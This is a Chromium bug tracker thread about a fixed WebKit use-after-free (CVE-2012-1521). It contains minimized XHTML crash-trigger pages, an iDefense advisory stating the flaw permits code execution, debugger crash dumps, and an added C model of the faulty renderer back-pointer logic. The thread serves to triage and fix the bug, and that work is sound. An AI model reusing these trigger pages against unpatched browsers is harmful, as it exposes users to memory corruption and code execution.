
Issue 117110 link

Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: Apr 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security


Heap-use-after-free in WebCore::RenderObjectChildList::destroyLeftoverChildren

Project Member Reported by infe...@chromium.org, Mar 7 2012

Issue description

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=22566581

Fuzzer: Bj_doc_fuzzer

Crash Type: Heap-use-after-free WRITE 8
Crash Address: 0x7f24bd8567c0
Crash State:
  - crash stack -
  WebCore::RenderObjectChildList::destroyLeftoverChildren
  WebCore::RenderBlock::willBeDestroyed
  - free stack -
  WebCore::ContainerNode::removeChildren
  WebCore::Node::setTextContent
  

Minimized Testcase (3.11 Kb): https://cluster-fuzz.appspot.com/download/AMIfv94wl0siP-kb4br4KcGV-FemuA50XuTG3W8elLcNb8Np5Bv4Z-J6B6Co_4z8wXy58Y69DjPK7biJlo-Kk29PnnBy6s8NLgnsTCrCpsi-FoFeneMeLKWAk4MGgnYTYMxZh5vIRN2qA2P_Vtbn1Fz3fHzAuJHagA
Issue 117111 has been merged into this issue.

Comment 2 Deleted

Cc: rniwa@chromium.org
I didn't get to the bottom of this yet, but here's what I got so far:

1) while parsing repro html:
   a) an appended style tag is created
   b) "DOMSubtreeModified" and onload event handlers are registered
   c) an appended element is created (any element will do)
   d) "DOMSubtreeModified" event handler fires, and calls "document.adoptNode(oHtml)", where oHtml is the documentElement. (I remove the "DOMSubtreeModified" as there's no more need for it)
   e) another appended element is created (any element will do)
2) the "onload" event is fired
... at that point, it appears as if elements get attached to the DOM multiple times, which is detected in ASSERTs. I think this is the reason for the issue; it causes renderers to get freed before the code is done using them. I'm a bit fuzzy on how exactly renderers and elements are associated, so I'm guessing at this point.

I'll continue my investigation on Thursday, but feel free to finish it before then if you're interested.

<html xmlns='http://www.w3.org/1999/xhtml'>
  <style></style>
  <script>
  <![CDATA[
    var oHtml = document.documentElement;
    document.addEventListener("DOMSubtreeModified", function DOMSubtreeModified_handler() {
      document.removeEventListener("DOMSubtreeModified", DOMSubtreeModified_handler, true);
      debugbreak(oHtml);
      document.adoptNode(oHtml);
    }, true);
    window.onload=function(){
      document.execCommand("Superscript");
      document.appendChild(oHtml);
      oHtml.textContent="";
    };
   ]]>
  </script>
  <x/>
  <x/>
</html>
Cc: adamk@chromium.org
Okay, I just cut a lot of the code and replaced it with inline docs. The repro is relatively simple, but I'm not at home with my debug build to do further analysis. I'll have a quick look at the code to see if there's an obvious explanation for this. If not, I'll try to look at this some more when I get back.

<html xmlns="http://www.w3.org/1999/xhtml">
  <style></style>
  <script>
  <![CDATA[
    var oHtml = document.documentElement;
    // At this point, the html element contains the style and script elements, 
    // and a number of text nodes, but not the "x" element or any of the 
    // text nodes that come after the script tag.
    document.removeChild(oHtml); 
    // Even though the html element is no longer attached to the document, chrome
    // will continue to add elements and text nodes to it while parsing the
    // rest of the document.
    window.onload = function() {
      // At this point, all the elements and text nodes have been added to the
      // html element. The html element is attached back to the document:
      document.appendChild(oHtml);
      // and the text node that follows the "x" element is removed:
      oHtml.removeChild(oHtml.lastChild);
      // At this point, stuff is messed up.
      setTimeout("location.reload();", 100);
    };
   ]]>
  </script>
  <x/>
</html>
Labels: -Mstone-17 Mstone-18
Updating milestone. m18 is already out.
Oddly enough ClusterFuzz cannot reproduce with the latest repro.
https://cluster-fuzz.appspot.com/testcase?key=29641344
It crashes reliably for me with the same stack...

Comment 10 by kareng@google.com, Mar 30 2012

Labels: -Mstone-18 Mstone-20

Comment 11 by kareng@google.com, Mar 30 2012

Labels: MovedFrom18
Labels: -Mstone-20 -MovedFrom18 Mstone-18
Reverting wrong marking of security bugs by release management.
iDefense VCP Submission V-874rcfpq7z
04/04/2012
Multiple Vendor WebKit 'RenderObject.m_node' Use After Free Vulnerability

Description:
Remote exploitation of a use-after-free vulnerability in WebKit, as included with multiple vendors' browsers, could allow an attacker to execute arbitrary code with the privileges of the current user.

WebKit is an open-source Web browser engine. It is currently used by Apple Inc.'s Safari browser, and Google's Chrome browser. For more information, see the vendor's site at the following link:

http://webkit.org/

This vulnerability occurs when manipulating the DOM tree via asynchronous JavaScript Event Handlers. Specifically, it is possible for the same DOM node to be attached to two different rendering contexts, which can lead to a use-after-free vulnerability when one of the rendering objects is destroyed. The stale reference remains attached to the second rendering object, which triggers a use-after-free vulnerability when it is later destroyed.

Analysis:
Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the user viewing the Web page. To exploit this vulnerability, a targeted user must load a malicious Web page created by an attacker. An attacker typically accomplishes this via social engineering or injecting content into compromised, trusted sites. After the user visits the malicious Web page, no further user interaction is needed.

To exploit this vulnerability, it is necessary to reallocate a block of freed memory with attacker-controlled data. Labs testing has demonstrated that this is possible and that it can be performed reliably.

If Safari is being used on Windows, iDefense recommends configuring the affected application to use the exploitation mitigations provided by the Microsoft EMET tool linked to in the Sources section. This will not prevent exploitation, but it will make it more complex on platforms that support DEP and ASLR.

Credit:
wushi of team509



webkit RenderText::deleteTextBoxes use after free Vulnerability

Discovery Date:  Oct 11, 2011
Discovery By :  wushi of team509

Systems Affected

This vulnerability affects the following software :

    * apple safari 5.1.2 and chrome 15.x~17.x (tested on windows & MAC OS )

Overview
webkit contains a vulnerability. This vulnerability may allow attackers to remotely
execute arbitrary code on the affected system. Exploitation may occur as the result of using the
affected webkit application to visit a website. The privileges gained by a remote attacker depend on the software
component being attacked.


I. Description:
    Unpack webkit11-18.rar to get test0.xhtml; open test0.xhtml using Safari, and Safari will crash.


On Windows, the crash looks like this:

eax=7ff5d660 ebx=7feeace8 ecx=00790053 edx=5cc3f3c0 esi=7feeace8 edi=7feeaae0
eip=5cc3f33b esp=001beca4 ebp=00000000 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Common Files\Apple\Apple Application Support\WebKit.dll - 
WebKit!setUseOpenSourceWebKit+0x81a7b:
5cc3f33b 83792000        cmp     dword ptr [ecx+20h],0 ds:0023:00790073=????????
0:000> k
ChildEBP RetAddr  
WARNING: Stack unwind information not available. Following frames may be wrong.
00000000 00000000 WebKit!setUseOpenSourceWebKit+0x81a7b


We can use Chrome to analyze the vuln, because it has symbols.
We use 17.0.941.0 (the newest version of Chrome).
eax=00000000 ebx=0519695c ecx=05197194 edx=00000000 esi=05196c04 edi=051969d8
eip=02384d37 esp=0024e6e4 ebp=0024e768 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
chrome_1730000!WebCore::RenderText::deleteTextBoxes+0xe:
02384d37 8b9850040000    mov     ebx,dword ptr [eax+450h] ds:0023:00000450=????????

1:020> kv
DBGHELP: ntdll - public symbols  
         d:\symbols\ntdll.pdb\120028FA453F4CD5A6A404EC37396A582\ntdll.pdb
ChildEBP RetAddr  Args to Child              
0024e6e4 0239f758 05196c04 023a19c7 e7940501 chrome_1730000!WebCore::RenderText::deleteTextBoxes+0xe (FPO: [0,0,0]) (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\rendertext.cpp @ 288]
0024e6ec 023a19c7 e7940501 05196338 00000000 chrome_1730000!WebCore::dirtyLineBoxesForRenderer+0x41 (FPO: [1,0,1]) (CONV: cdecl) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblocklinelayout.cpp @ 378]
0024e768 0238e62e 0019695c 00000000 0024e701 chrome_1730000!WebCore::RenderBlock::layoutInlineChildren+0x18b (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblocklinelayout.cpp @ 1471]
0024e7fc 0238e2a7 00000000 00000000 00000000 chrome_1730000!WebCore::RenderBlock::layoutBlock+0x369 (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1293]
0024e810 0238fcb2 05112ca0 0519695c 05196650 chrome_1730000!WebCore::RenderBlock::layout+0x1b (FPO: [0,0,1]) (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1172]
0024e858 0238faf3 010000ab 0024e87c 0124e8a8 chrome_1730000!WebCore::RenderBlock::layoutBlockChild+0x19d (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 2059]
0024e8bc 0238e63e 0519695c 00000000 0024e8f0 chrome_1730000!WebCore::RenderBlock::layoutBlockChildren+0x23a (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1970]
0024e94c 0238e2a7 00000000 00000000 00000000 chrome_1730000!WebCore::RenderBlock::layoutBlock+0x379 (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1297]
0024e960 0238fcb2 05112d30 05196650 051964f8 chrome_1730000!WebCore::RenderBlock::layout+0x1b (FPO: [0,0,1]) (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1172]
0024e9a8 0238faf3 01000000 0024e9cc 0124e9f8 chrome_1730000!WebCore::RenderBlock::layoutBlockChild+0x19d (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 2059]
0024ea0c 0238e63e 05196650 00000000 0024ea40 chrome_1730000!WebCore::RenderBlock::layoutBlockChildren+0x23a (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1970]
0024ea9c 0238e2a7 00000000 00000000 00000000 chrome_1730000!WebCore::RenderBlock::layoutBlock+0x379 (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1297]
0024eab0 0238fcb2 05113168 051964f8 05196338 chrome_1730000!WebCore::RenderBlock::layout+0x1b (FPO: [0,0,1]) (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1172]
0024eaf8 0238faf3 01000000 0024eb1c 0124eb48 chrome_1730000!WebCore::RenderBlock::layoutBlockChild+0x19d (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 2059]
0024eb5c 0238e63e 051964f8 00000000 0024eb90 chrome_1730000!WebCore::RenderBlock::layoutBlockChildren+0x23a (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1970]
0024ebec 0238e2a7 00000000 00000000 00000000 chrome_1730000!WebCore::RenderBlock::layoutBlock+0x379 (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1297]
0024ec00 0235c1e0 05196338 00000000 05122450 chrome_1730000!WebCore::RenderBlock::layout+0x1b (FPO: [0,0,1]) (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1172]
0024ec78 023d2351 0024ed6c 05196338 0519641c chrome_1730000!WebCore::RenderView::layout+0x185 (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderview.cpp @ 137]
0024ecdc 025c89e1 00000001 0510f0d8 02355e70 chrome_1730000!WebCore::FrameView::layout+0x514 (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\page\frameview.cpp @ 1095]
0024ece8 02355e70 0510f0d8 0024ee10 0510f0d8 chrome_1730000!WebCore::Document::updateLayout+0x4a (FPO: [0,0,1]) (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\dom\document.cpp @ 1641]
1:020> r
eax=00000000 ebx=0519695c ecx=05197194 edx=00000000 esi=05196c04 edi=051969d8
eip=02384d37 esp=0024e6e4 ebp=0024e768 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
chrome_1730000!WebCore::RenderText::deleteTextBoxes+0xe:
02384d37 8b9850040000    mov     ebx,dword ptr [eax+450h] ds:0023:00000450=????????
1:020> u
chrome_1730000!WebCore::RenderText::deleteTextBoxes+0xe [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\rendertext.cpp @ 288]:
02384d37 8b9850040000    mov     ebx,dword ptr [eax+450h]
02384d3d 57              push    edi
02384d3e 8b01            mov     eax,dword ptr [ecx]
02384d40 8b792c          mov     edi,dword ptr [ecx+2Ch]
02384d43 53              push    ebx
02384d44 ff5004          call    dword ptr [eax+4]
02384d47 8bcf            mov     ecx,edi
02384d49 85ff            test    edi,edi
1:020> u eip -10
chrome_1730000!WebCore::RenderText::willBeDestroyed+0x3b [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\rendertext.cpp @ 232]:
02384d27 c9              leave
02384d28 c3              ret
chrome_1730000!WebCore::RenderText::deleteTextBoxes [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\rendertext.cpp @ 286]:
02384d29 8b4e2c          mov     ecx,dword ptr [esi+2Ch]
02384d2c 85c9            test    ecx,ecx
02384d2e 7425            je      chrome_1730000!WebCore::RenderText::deleteTextBoxes+0x2c (02384d55)
02384d30 8b4608          mov     eax,dword ptr [esi+8]
02384d33 8b4018          mov     eax,dword ptr [eax+18h]
02384d36 53              push    ebx
1:020> u
chrome_1730000!WebCore::RenderText::deleteTextBoxes+0xe [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\rendertext.cpp @ 288]:
02384d37 8b9850040000    mov     ebx,dword ptr [eax+450h]
02384d3d 57              push    edi
02384d3e 8b01            mov     eax,dword ptr [ecx]
02384d40 8b792c          mov     edi,dword ptr [ecx+2Ch]
02384d43 53              push    ebx
02384d44 ff5004          call    dword ptr [eax+4]
02384d47 8bcf            mov     ecx,edi
02384d49 85ff            test    edi,edi
1:020> dd esi
05196c04  02d9d170 051131f8 05363500 051969d8
05196c14  00000000 05196c48 4040a800 00000000
05196c24  42180000 00000000 051abdf0 05197194
05196c34  05197194 41000000 00000000 00000000
05196c44  43150199 02d9d170 051131f8 05363538
05196c54  051969d8 05196c04 05196da8 0040a820
05196c64  05196b40 0378e4c8 bf800000 05201028
05196c74  00000000 00000000 bf800000 00000000
1:020> dd esi+8
05196c0c  05363500 051969d8 00000000 05196c48
05196c1c  4040a800 00000000 42180000 00000000
05196c2c  051abdf0 05197194 05197194 41000000
05196c3c  00000000 00000000 43150199 02d9d170
05196c4c  051131f8 05363538 051969d8 05196c04
05196c5c  05196da8 0040a820 05196b40 0378e4c8
05196c6c  bf800000 05201028 00000000 00000000
05196c7c  bf800000 00000000 00000000 05196c98
1:020> dd 05363500
05363500  000011cf 00000000 00000000 00000000
05363510  00000000 00000000 00000000 00000000
05363520  00000000 00000000 00000000 00000000
05363530  6748adfe 8c000000 02dcf6a8 02dcf7fc
05363540  03734b68 00000000 00000000 00580a01
05363550  0510f0d8 00000000 00000000 05196da8
05363560  05201438 00000000 6748adf5 8c000000
05363570  02dcf6a8 02dcf7fc 0374dd80 00000000
1:020> !heap -p -a 05363500
    address 05363500 found in
    _HEAP @ 980000
      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
        053634f8 0007 0000  [00]   05363500    00030 - (free)

It's clear the vuln is exploitable.
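The mechanism the comments above describe, a node that ends up attached to the render tree twice so that one renderer keeps an m_node back-pointer the node no longer knows about (the second comment's "elements get attached to the DOM multiple times"), and the iDefense description of "the same DOM node attached to two different rendering contexts", reduced to a constructed C model. This is an added illustration, not WebKit code: the Node and Renderer structs, attach_buggy, attach_checked, node_detach and the counting helpers are stand-ins chosen for the example, and the node is deliberately left un-freed so the final write lands in live memory instead of reproducing the crash.

```c
/* Constructed model of the DOM-node <-> renderer back-pointer invariant that
 * issue 117110 violates. Not WebKit code: Node stands in for WebCore::Node
 * (m_renderer), Renderer for WebCore::RenderObject (m_node). */
#include <stdio.h>
#include <stdlib.h>

typedef struct Node Node;
typedef struct Renderer Renderer;

struct Renderer {
    Node *node;             /* back-pointer to the DOM node (RenderObject::m_node) */
    Renderer *parent;
    Renderer *first_child;
    Renderer *next_sibling;
};

struct Node {
    Renderer *renderer;     /* the one renderer a node may own (Node::m_renderer) */
};

static Renderer *renderer_new(Node *n, Renderer *parent)
{
    Renderer *r = calloc(1, sizeof *r);
    if (!r) abort();
    r->node = n;
    r->parent = parent;
    if (parent) {
        r->next_sibling = parent->first_child;
        parent->first_child = r;
    }
    return r;
}

static void renderer_unlink(Renderer *r)
{
    if (!r->parent) return;
    Renderer **pp = &r->parent->first_child;
    while (*pp && *pp != r)
        pp = &(*pp)->next_sibling;
    if (*pp) *pp = r->next_sibling;
    r->parent = NULL;
    r->next_sibling = NULL;
}

/* Mirror of RenderObjectChildList::destroyLeftoverChildren: before a renderer
 * dies, each child's node gets its renderer pointer cleared, i.e. we WRITE
 * through child->node. If that node has already been freed, this is the
 * use-after-free write. Returns how many nodes were written through. */
static int renderer_destroy(Renderer *r)
{
    int writes = 0;
    while (r->first_child) {
        Renderer *c = r->first_child;
        r->first_child = c->next_sibling;
        c->parent = NULL;
        if (c->node) {
            c->node->renderer = NULL;   /* the write through m_node */
            writes++;
        }
        writes += renderer_destroy(c);
    }
    renderer_unlink(r);
    free(r);
    return writes;
}

/* Buggy attach: always creates a fresh renderer. If the node is already
 * attached, the old renderer keeps its back-pointer but the node forgets it. */
static Renderer *attach_buggy(Node *n, Renderer *parent)
{
    n->renderer = renderer_new(n, parent);
    return n->renderer;
}

/* Checked attach: enforce "at most one renderer per node" (the ASSERT the
 * second comment mentions, made to hold in release builds too). */
static Renderer *attach_checked(Node *n, Renderer *parent)
{
    if (n->renderer)
        return NULL;
    n->renderer = renderer_new(n, parent);
    return n->renderer;
}

/* Node removal (the removeChildren path in the free stack): destroy the one
 * renderer the node knows about. Any other renderer still pointing at the
 * node is left dangling; freeing the node afterwards sets up the UAF. */
static void node_detach(Node *n)
{
    Renderer *r = n->renderer;
    if (!r) return;
    n->renderer = NULL;
    r->node = NULL;
    renderer_unlink(r);
    renderer_destroy(r);
}

/* Count renderers whose node does not point back at them: stale m_node refs. */
static int count_stale_backrefs(Renderer *r)
{
    int stale = 0;
    for (Renderer *c = r->first_child; c; c = c->next_sibling) {
        if (c->node && c->node->renderer != c)
            stale++;
        stale += count_stale_backrefs(c);
    }
    return stale;
}

/* The repro's shape: one node attached twice, then removed. Returns the number
 * of stale back-pointers left behind (1). n lives on the stack and is never
 * freed, so the final renderer_destroy writes into live memory; in WebKit the
 * node had been freed by setTextContent(), which is what ASan caught. */
int double_attach_leaves_stale_backref(void)
{
    Node n = { NULL };
    Renderer *root = renderer_new(NULL, NULL);
    attach_buggy(&n, root);
    attach_buggy(&n, root);         /* second attach orphans the first renderer */
    node_detach(&n);                /* only the second renderer is destroyed */
    int stale = count_stale_backrefs(root);
    renderer_destroy(root);         /* writes through the stale pointer */
    return stale;
}

/* Same sequence with the invariant enforced: the second attach is refused and
 * no stale back-pointer survives node removal. Returns 0. */
int checked_attach_leaves_no_stale_backref(void)
{
    Node n = { NULL };
    Renderer *root = renderer_new(NULL, NULL);
    attach_checked(&n, root);
    Renderer *second = attach_checked(&n, root);   /* NULL: already attached */
    node_detach(&n);
    int stale = count_stale_backrefs(root);
    renderer_destroy(root);
    return second == NULL ? stale : -1;
}

int main(void)
{
    printf("buggy attach:   %d stale renderer->node back-pointer(s)\n",
           double_attach_leaves_stale_backref());
    printf("checked attach: %d stale renderer->node back-pointer(s)\n",
           checked_attach_leaves_no_stale_backref());
    return 0;
}
```

Build with `cc -Wall model.c && ./a.out`. The buggy path reports one stale back-pointer, the checked path none. The write that renderer_destroy performs through the stale pointer corresponds to the write destroyLeftoverChildren makes in the crash stack; with the node already freed via setTextContent(), that is the "Heap-use-after-free WRITE 8" in the report, and the hardened attach is the point at which the double attachment should have been refused.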
Labels: ReleaseBlock-Stable
Let's make sure to fix this one in the next patch, where possible.
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=34044943

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free WRITE 8
Crash Address: 0x7faabd95dfc0
Crash State:
  - crash stack -
  WebCore::RenderObjectChildList::destroyLeftoverChildren
  WebCore::RenderInline::willBeDestroyed
  - free stack -
  WebCore::ContainerNode::removeChildren
  WebCore::Node::setTextContent
  

Minimized Testcase (0.71 Kb): https://cluster-fuzz.appspot.com/download/AMIfv97Q7JrNdf-dAX6XsUuClhRbSN2oZYy0wUeYwdCLIkVCLbM3qs2XUhsFbEmKhejh42ytqu5zs77DQWjMKPQ7d7z-hOuWRwoH2EonNcd_aRp19mt3hHuXR3lOeOCSc7tT-dEr5HO0TWXzxm3hDgPesjkMEkWEBw

Comment 16 by palmer@google.com, Apr 9 2012

Alarmingly, I get a full browser crash on Linux on M19, not just a renderer crash.
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Owner: infe...@chromium.org
Status: FixUnreleased
http://trac.webkit.org/changeset/113670
Project Member

Comment 18 by ClusterFuzz, Apr 11 2012

ClusterFuzz has detected this issue as fixed in range 131591:131615.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=22566581

Fuzzer: Bj_doc_fuzzer

Crash Type: Heap-use-after-free WRITE 8
Crash Address: 0x7f24bd8567c0
Crash State:
  - crash stack -
  WebCore::RenderObjectChildList::destroyLeftoverChildren
  WebCore::RenderBlock::willBeDestroyed
  - free stack -
  WebCore::ContainerNode::removeChildren
  WebCore::Node::setTextContent
  
Fixed: https://cluster-fuzz.appspot.com/revisions?range=131591:131615

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv94wl0siP-kb4br4KcGV-FemuA50XuTG3W8elLcNb8Np5Bv4Z-J6B6Co_4z8wXy58Y69DjPK7biJlo-Kk29PnnBy6s8NLgnsTCrCpsi-FoFeneMeLKWAk4MGgnYTYMxZh5vIRN2qA2P_Vtbn1Fz3fHzAuJHagA

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Project Member

Comment 19 by ClusterFuzz, Apr 11 2012

ClusterFuzz has detected this issue as fixed in range 131591:131615.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=34044943

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free WRITE 8
Crash Address: 0x7faabd95dfc0
Crash State:
  - crash stack -
  WebCore::RenderObjectChildList::destroyLeftoverChildren
  WebCore::RenderInline::willBeDestroyed
  - free stack -
  WebCore::ContainerNode::removeChildren
  WebCore::Node::setTextContent
  
Fixed: https://cluster-fuzz.appspot.com/revisions?range=131591:131615

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv97Q7JrNdf-dAX6XsUuClhRbSN2oZYy0wUeYwdCLIkVCLbM3qs2XUhsFbEmKhejh42ytqu5zs77DQWjMKPQ7d7z-hOuWRwoH2EonNcd_aRp19mt3hHuXR3lOeOCSc7tT-dEr5HO0TWXzxm3hDgPesjkMEkWEBw

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Labels: -Merge-Approved Merge-Merged
M18: http://trac.webkit.org/changeset/114850
M19: http://trac.webkit.org/changeset/114851
Labels: CVE-2012-1521

Comment 26 by cdn@chromium.org, May 15 2012

Status: Fixed
Marking old security bugs Fixed.
Project Member

Comment 27 by bugdroid1@chromium.org, Oct 13 2012

Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.

Comment 28 by laforge@google.com, Jan 18 2013

Labels: Restrict-View-EditIssue
Project Member

Comment 29 by bugdroid1@chromium.org, Mar 10 2013

Labels: -Area-WebKit -Type-Security -SecSeverity-High -SecImpacts-Stable -SecImpacts-Beta -Stability-AddressSanitizer -Mstone-18 Cr-Content Security-Impact-Stable Security-Impact-Beta Type-Bug-Security M-18 Security-Severity-High Performance-Memory-AddressSanitizer
Project Member

Comment 30 by bugdroid1@chromium.org, Mar 13 2013

Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member

Comment 32 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Severity-High Security_Severity-High
Project Member

Comment 33 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member

Comment 34 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member

Comment 35 by bugdroid1@chromium.org, Apr 1 2013

Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Project Member

Comment 36 by bugdroid1@chromium.org, Apr 6 2013

Labels: -Cr-Content Cr-Blink
Project Member

Comment 37 by sheriffbot@chromium.org, Jun 14 2016

Labels: -security_impact-beta
Project Member

Comment 38 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 39 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-submitted
